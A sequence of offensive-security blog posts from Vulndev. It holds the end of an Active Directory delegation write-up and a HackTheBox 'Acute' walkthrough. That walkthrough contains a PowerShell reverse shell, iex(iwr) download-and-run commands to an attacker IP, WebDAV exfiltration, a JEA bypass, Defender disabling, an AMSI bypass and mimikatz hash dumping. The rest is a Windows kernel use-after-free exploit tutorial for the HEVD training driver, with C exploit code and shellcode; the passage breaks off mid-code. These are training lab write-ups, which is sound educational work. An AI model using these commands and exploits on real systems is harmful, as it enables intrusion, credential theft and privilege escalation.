export KRB5CCNAME=`pwd`/ticket.ccache
klist
impacket-psexec -k -no-pass resourced.local/[email protected] -dc-ip 192.168.114.175

Resources

The post Resource-Based Constrained Delegation – Resourced @ PG-Practice appeared first on Vulndev.

Active Directory, JEA & Random Stuff – Acute @ HackTheBox

By: xct
16 July 2022 at 15:00

Acute is a 40-point Active Directory Windows machine on HackTheBox. I’m going to use it to show some techniques which can be useful in other scenarios and keep it short on the things that are not that important.

User

Foothold

We visit https://atsserver.acute.local and find a company page. On the about page there is a list of usernames: Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins. There is also a .docx file linked on the page which we download & read. This has a link to https://atsserver.acute.local/Acute_Staff_Access and mentions a default password β€œPassword1!”. On /Acute_Staff_Access we have a powershell remoting web console. At this point we have to come up with a username scheme the company might use and spray the password against all of the potential usernames.

This will eventually lead to a valid login: Username: β€œacute\edavies”, Password: β€œPassword1!”, Computername: β€œAcute-PC01”. Now we have a WinRM shell on the Acute-PC01 and can continue to explore it. Because I don’t like this web shell we are upgrading it to a remote interactive shell:

PS C:\Users\edavies\Documents> iex(iwr http://10.10.14.7/run.txt -usebasicparsing)
...
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 49835
[>] whoami
acute\edavies

Contents of run.txt:

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.7",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "[>] ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

By looking at the running processes, we can see a lot of session 1 processes, including Edge, which means that besides us, the user edavies is also logged on locally on the system. We can also confirm this via qwinsta:

[>] ps
...
908      43    22492      66556       4.75   1544   1 msedge
309      18    97720      23976       0.41   3732   1 msedge
205      14     6832      16952       0.25   4108   1 msedge
245      15     8476      24576       0.56   4932   1 msedge
135       9     1924       6552       0.03   5048   1 msedge
...
[>] qwinsta

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           edavies                   1  Active

Session 0 Isolation says Hello

As we are connected via PSRemoting/WinRM we are running in session 0 and as such we can not interact with the logged in users desktop (Sessions in Windows). This comes with many restrictions and we can not really get an idea what the user is doing on his desktop. We run a reverse shell via rcat and confirm that our shell is in session 0:

[>] iwr http://10.10.14.7/drop/rcat.exe -outfile
[>] C:\windows\temp\rcat_10.10.14.7_1337.exe 
...
nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 49880
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\temp> ps | findstr rcat
257       6      844       3544       0.00   5376   0 rcat_10.10.14.7_1337

One way to get out of session 0 is to inject into a process with a higher session id. This is only possible if we have either SeDebugPrivilege or the other process belongs to the same user (which is the case here). In the past you could inject shellcode and run it, but at this point all windows binaries are compiled with Control Flow Guard (CFG) so doing an indirect jump to shellcode is not allowed. To get around that, we will have to use a function that is already loaded and whitelisted. A common way to achive that, is to inject a DLL with LoadLibrary because this one is usually loaded & therefore will not cause any issues with CFG. It also has exactly one argument which is all we have when we want to use CreateRemoteThread to run code in a remote process.

In this case I decided to come up with a custom way that does not involve loading a DLL. If we look at the imports of explorer.exe we can see that it imports ShellExecuteExW from user32.dll:

BOOL ShellExecuteExW(
  [in, out] SHELLEXECUTEINFOW *pExecInfo
);

This function is pretty much ideal: It has exactly one argument (just like LoadLibrary) and allows to run any binary on disk. So in the end I ended up finding where the address of ShellExecuteExW is loaded at in explorer.exe, allocated the required argument structure inside explorer.exe and used WriteProcessMemory to copy it into the explorer.exe process. Finally a call to CreateRemoteThread pointing to ShellExecuteW and the argument structure allows us to execute an arbitrary executeable. This is implemented in adopt.

So with this out of the way, we can continue to spawn a Session 1 process, using explorer.exe as a trampoline. We confirm that the new shell is indeed in session 1:

[>] iwr http://10.10.14.7/drop/adopt.exe -outfile C:\windows\temp\adopt.exe
[>] \windows\temp\adopt.exe explorer.exe c:\\windows\\temp\\rcat_10.10.14.7_1337.exe
...
nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 49820
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
Windows PowerShell

PS C:\temp> ps | findstr rcat
ps | findstr rcat
     73       6      856       3552       0.03   5856   1 rcat_10.10.14.7_1337

Spying on the user

Now we can interact with the users desktop, including start new desktop allocations or taking screenshots. I will take a couple of screenshots to get an idea on what the user is doing. This also lead me down a rabbit hole and I ended up coming with scr. This command line tool just takes a screenshot as β€œscr.jpg” . In order to get a few of those I run a simple loop, rename them & finally zip them up:

iwr http://10.10.14.7/drop/scr.exe -outfile C:\temp\scr.exe
1..10 | % { \temp\scr.exe; start-sleep -s 3; rename-item "scr.jpg" "scr-$_.jpg" }; Compress-Archive -Path *.jpg -DestinationPath scr.zip

Now copying out the files could be done with something like metasploit or xc but I got this far without them so lets try something else πŸ˜‰ We are going to use WebDAV to copy those to our attacker machine. There is a cool repo by qtc that allows to start nginx with webdav support in a docker container among other things, which I’m going to use here:

car run nginx
[+] Environment Variables:
[+]	car_local_uid                 1000
[+]	car_nginx_folder              /home/xct/arsenal/nginx
[+]	car_download_folder           /home/xct/arsenal/nginx/download
[+]	car_upload_folder             /home/xct/arsenal/nginx/upload
[+]	car_http_port                 80
[+]	car_https_port                443
[+]
[+] Running: sudo -E docker-compose up
Starting car.nginx ... done
Attaching to car.nginx
car.nginx    | [+] Adjusting UID values.
car.nginx    | [+] Adjusting volume permissions.
car.nginx    | [+] No password was specified.
car.nginx    | [+] Generated random password: SfGrc6Y2
car.nginx    | [+] Creating .htpasswd file.
car.nginx    | [+] WebDAV access allowed for default:SfGrc6Y2
car.nginx    | [+] Starting nginx daemon.

Now we can use PowerShell to PUT the file onto our system:

$auth = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(("{0}:{1}" -f "default","SfGrc6Y2")))
Invoke-RestMethod -Headers @{Authorization=("Basic {0}" -f $auth)} -Uri "http://10.10.14.7/upload/scr.zip" -Method Put -InFile "C:\temp\scr.zip"  

We look at our screenshot collection and can see that the user is using PowerShell trying to connect to a remote system. We copy the commands from the screenshot (by hand) and can connect to the remote system:

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -scriptblock { Get-Command }
...
CommandType     Name                                               Version    Source               PSComputerName
-----------     ----                                               -------    ------               --------------
Cmdlet          Get-Alias                                          3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-ChildItem                                      3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Command                                        3.0.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Content                                        3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Location                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Set-Content                                        3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Set-Location                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Write-Output                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER

Note that the last command specifies ConfigurationName which means that JEA is used here and we are limited in what we can run. A common bypass for JEA is to define a custom function and run it, which are doing:

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { function xct { iex(iwr http://10.10.14.7/run.txt -usebasicparsing) };xct }

This gets us a reverse shell on the DC and allows us to read the user flag on imonkβ€˜s desktop.

listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 52904
[>] hostname
ATSSERVER
[>] whoami
acute\imonks

Root

Another file on the desktop of imonk is wm.ps1, where we just have to modify the command to go back to Acute-PC01 with administrator privileges:

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock { iex(iwr http://10.10.14.7/run.txt -usebasicparsing) } -ComputerName Acute-PC01 -Credential $creds
...
[>] whoami
acute\jmorgan
[>] whoami /groups
...
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner

We can now disable AV & use mimikatz to dump the hashes on the system:

Add-MpPreference -ExclusionPath C:\temp
Set-MpPreference -DisableRealtimeMonitoring $true
iwr http://10.10.14.7/drop/mimikatz.exe -outfile mimikatz.exe

# bypass AMSI
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils"){$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

.\mimikatz.exe "token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
.\mimikatz.exe "token::elevate"  "lsadump::sam" "exit"
...
ACUTE-PC01$:   ea9815114ac78cdbb69ab9a39df66d73
Natasha:       29ab86c5c4d2aab957763e5c1720486d
Administrator: a29f7623fd11550def0192de9246f46b (cracks to [email protected])

The rest of the machine is not that interesting anymore, the local administrator password on Acute-PC01 is reused on another user awallace. Then we get a shell on the DC with that user & place a .bat file in the C:\Program files\keepmeon folder which is periodically executed as lhopkins which has Generic Write to to the Site_Admin group which in turn has DA access. At this point you can add any of your already compromised users to that group (e.g. net group "Site_Admin" awallace /add & are done.

The post Active Directory, JEA & Random Stuff – Acute @ HackTheBox appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Use-After-Free

By: xct
14 July 2022 at 19:48

This part will look at a Use-After-Free vulnerability in HEVD on Windows 11 x64.

Vulnerability Discovery


We are going to tackle this based on the source instead of the assembly again. There are 4 functions that are interesting for the UAF vulnerability:

  • AllocateUaFObjectNonPagedPool
  • FreeUaFObjectNonPagedPool
  • AllocateFakeObjectNonPagedPool
  • UseUaFObjectNonPagedPool

The general idea is that we allocate an object on the kernel heap (on the non-paged pool, which is an area of memory that can not be paged out) using AllocateUaFObjectNonPagedPool. Then we call FreeUaFObjectNonPagedPool which will free the object. If done correctly, there should be no references to the object left in the kernel – this is however not the case here. On allocate, a global variable g_UseAfterFreeObjectNonPagedPool is set to the address of the object:

NTSTATUS AllocateUaFObjectNonPagedPool(VOID) {
    ...
    UseAfterFree = (PUSE_AFTER_FREE_NON_PAGED_POOL) ExAllocatePoolWithTag(NonPagedPool, sizeof(USE_AFTER_FREE_NON_PAGED_POOL), (ULONG)POOL_TAG);
    ...
    g_UseAfterFreeObjectNonPagedPool = UseAfterFree;
    ...  
}

Then when the object gets freed, this reference does not get set to NULL, so it is still pointing to the now freed memory.

NTSTATUS FreeUaFObjectNonPagedPool(VOID){
    ...
    ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);
    ...
}

This in itself would not be a huge issue but this global variable is actually being used by UseUaFObjectNonPagedPool which is running a method called Callback on it:

NTSTATUS UseUaFObjectNonPagedPool(VOID) {
    ...
    if (g_UseAfterFreeObjectNonPagedPool->Callback) {
        g_UseAfterFreeObjectNonPagedPool->Callback();
    }
    ...
}

When the global object has been freed and this function is invoked, we would have undefined behavior. One possibility is that another object of the same size could take its place, and then the driver would attempt to call the Callback function on the new object instead (which for a random object will likely fail since its memory layout will be completely different). HEVD has a AllocateFakeObjectNonPagedPool function that conveniently allows us to create a user-controlled object of the same size. There is however the issue of getting it exactly into the spot of the just before freed object – windows randomizes heap allocations so a new allocation could be created anywhere.

Exploitation

Before starting with any exploitation we have to understand where our object is, how big it is and what a replacement object should look like. We also need to find a way to fill the hole with our object which is not straightforward.

We start with some template code that just allocates the object, triggers a breakpoint, and then frees the object again should we let execution continue:

#include <stdio.h>
#include <Windows.h>

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    
    
    // Allocate UAF Object
    DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL);
    // Debug
    DebugBreak();
    // Free UAF Object
    DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL);

    return 0;
}

We saw in the allocate function earlier that it allocates the object in the non-paged pool using ExAllocatePoolWithTag. The tag it uses (here β€œHack”) is a way to identify objects in that pool. We can search for all objects tagged this way in the debugger:

0: kd> !poolused 2 Hack
...
               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 Hack         1          112          0            0	UNKNOWN pooltag 'Hack', please update pooltag.txt

TOTAL         1          112          0            0

This shows that currently there is exactly one allocation with that tag (the one we just created ourselves). Lets now find the address of that object:

0: kd> !poolfind Hack -nonpaged
ffffe60269102050 : tag Hack, size      0x60, Nonpaged pool

This works but can take a lot of time. There is an alternative way to let us check the allocations while they happen with ed nt!PoolHitTag 'Hack'. But for now, we are going to stick with the address we just got with poolfind. It shows us that the size of the object is 0x60 (+0x10 bytes header), which means that we later need to find some native windows kernel object that has the same size.

0: kd> dq ffffe60269102050 L0xC
ffffe602`69102050  fffff800`31117c58 41414141`41414141
ffffe602`69102060  41414141`41414141 41414141`41414141
ffffe602`69102070  41414141`41414141 41414141`41414141
ffffe602`69102080  41414141`41414141 41414141`41414141
ffffe602`69102090  41414141`41414141 41414141`41414141
ffffe602`691020a0  41414141`41414141 00000000`00414141

We can see that this object is mostly filled with β€œA”s. Only the first value is a function pointer and this is exactly the callback we identified in the introduction section. If we compare that with the object we can see in the source it matches our assumption:

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL {
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;

You might have noticed that the size does not exactly lead to 0x60 when looking at this object (0x54 + 8 = 0x5C). The remaining 4 bytes I assume are padding (we can see they are zero). Now that we know the size we are looking for another kernel object that is suitable for us.

There is some excellent research by Alex Ionescu on Kernel Fengshui which dives into this topic and shows that using CreatePipe and WritePipe allows allocating an almost arbitrary size object (> 0x48) in the non-paged pool. Let’s create such an object and try to find it in memory so we can confirm it has indeed the correct size.

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }
   
    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }  
    return PipeHandles{ readPipe, writePipe };
}

After adding the function to create such pipe objects we can now create one in our main function:

int main() {
   ...
   PipeHandles pipeHandle = CreatePipeObject();
   printf("[>] Handles: 0x%llx, 0x%llx\n", pipeHandle.read, pipeHandle.write);
   getchar();
   DebugBreak();
}

When we run this, we get the handles to the pipes printed out, allowing us to inspect them:

C:\Users\xct\Desktop>exploit.exe
[>] Handles: 0xa8, 0xac
1: kd> !handle 0xa8
PROCESS ffffe6026dceb080
    SessionId: 1  Cid: 18c0    Peb: 27c6f1f000  ParentCid: 10e8
    DirBase: 1ad85d000  ObjectTable: ffff968b91808b00  HandleCount:  43.
    Image: exploit.exe

Handle table at ffff968b91808b00 with 43 entries in use
00a8: Object: ffffe602706bda30  GrantedAccess: 00120189 Entry: ffff968b8f5ff2a0
Object: ffffe602706bda30  Type: (ffffe602696fa7a0) File
    ObjectHeader: ffffe602706bda00 (new version)
        HandleCount: 1  PointerCount: 32768

We can see that it is a file object, that it’s used by our process, and the address it is at. Let’s inspect the memory further:

1: kd> !address ffffe602706bda30
...
Usage:                  
Base Address:           ffffcb8a`6b5d5000
End Address:            fffff780`00000000
Region Size:            00002bf5`94a2b000
VA Type:                SystemRange

1: kd> !pool ffffe602706bda30
Pool page ffffe602706bda30 region is Nonpaged pool
 ffffe602706bd050 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd1e0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd370 size:  190 previous size:    0  (Free)       File
 ffffe602706bd500 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd690 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd820 size:  190 previous size:    0  (Allocated)  File
*ffffe602706bd9b0 size:  190 previous size:    0  (Allocated) *File
		Pooltag File : File objects
 ffffe602706bdb40 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bdcd0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bde60 size:  190 previous size:    0  (Allocated)  File

We can see here that the object is in the nonpaged pool but its size is 0x190 which is not quite what we are looking for so what is going on? We are not really looking for the file object itself but for the DATA_ENTRY object that is created, which is an undocumented structure. These objects will be allocated with a tag: β€œNpFr”. Let’s try to find it:

1: kd> !poolused 2 NpFr
Using a machine size of 1ffe4d pages to configure the kd cache
..
 Sorting by NonPaged Pool Consumed

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 NpFr         1          112          0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL         1          112          0            0
1: kd> !poolfind NpFr -nonpaged
...

There is again exactly one, which we just allocated. Finding the exact object in memory turned out to be a bit difficult since poolfind did not succeed to find it on my end. The general structure of this DATA_ENTRY object looks like this, followed by the actual data:

typedef struct _NP_DATA_QUEUE_ENTRY {
    LIST_ENTRY QueueEntry;
    ULONG DataEntryType;
    PIRP Irp;
    ULONG QuotaInEntry;
    PSECURITY_CLIENT_CONTEXT ClientSecurityContext;
    ULONG DataSize;
} NP_DATA_QUEUE_ENTRY, *PNP_DATA_QUEUE_ENTRY;

These DATA_ENTRY objects will be placed on the nonpaged pool and we can control their size which solves part of what we are trying to achieve. The next problem we have is that when we trigger the free in the driver and create a β€œhole” in memory, we can not control what is going to fill that hole – after all the kernel is very busy and could place some other object that fits there. Even if we were faster than the kernel to allocate an object of the correct size, we would still not be guaranteed to fill the spot that we freed since heap allocations on modern windows are randomized.

A way to get around that is to spray the heap with a lot of these holes, surrounded by allocations we control. This gives us a good chance to get our UAF object into one of those. After allocating and freeing the object via the vulnerable driver we allocate a huge amount of fake objects (fake objects being the ones we can create via AllocateFakeObjectNonPagedPool) to have a good chance to fill the exact hole the UAF object left.

To summarize:

  • Allocate a lot of DATA_ENTRY objects (CreatePipe + WriteFile)
  • Free every 2nd DATA_ENTRY object to create a lot of holes
  • Allocate the UAF object and Free it (this will likely happen in one of the holes we just created)
  • Allocate a lot of fake objects to fill every hole (including the one we have to hit to successfully exploit it)

This leads us to the following code:

#include <stdio.h>
#include <Windows.h>
#include <vector>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(0xdeadc0de);
    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    return 0;
}

Running the updated PoC shows that this indeed works and places 0xdeadc0de in RIP:

Access violation - code c0000005 (!!! second chance !!!)
00000000`deadc0de ??              ???

At this point exploiting the vulnerability is exactly the same process as in the last post about the type-confusion vulnerability. We pivot the stack to a location we control and make sure it’s paged in. Then we use ROP to disable SMEP & jump to our shellcode. For details about how to do this please refer to the last post – we use exactly the same gadgets & shellcode. The updated PoC looks as follows:

#include <stdio.h>
#include <Windows.h>
#include <vector>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");    
    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
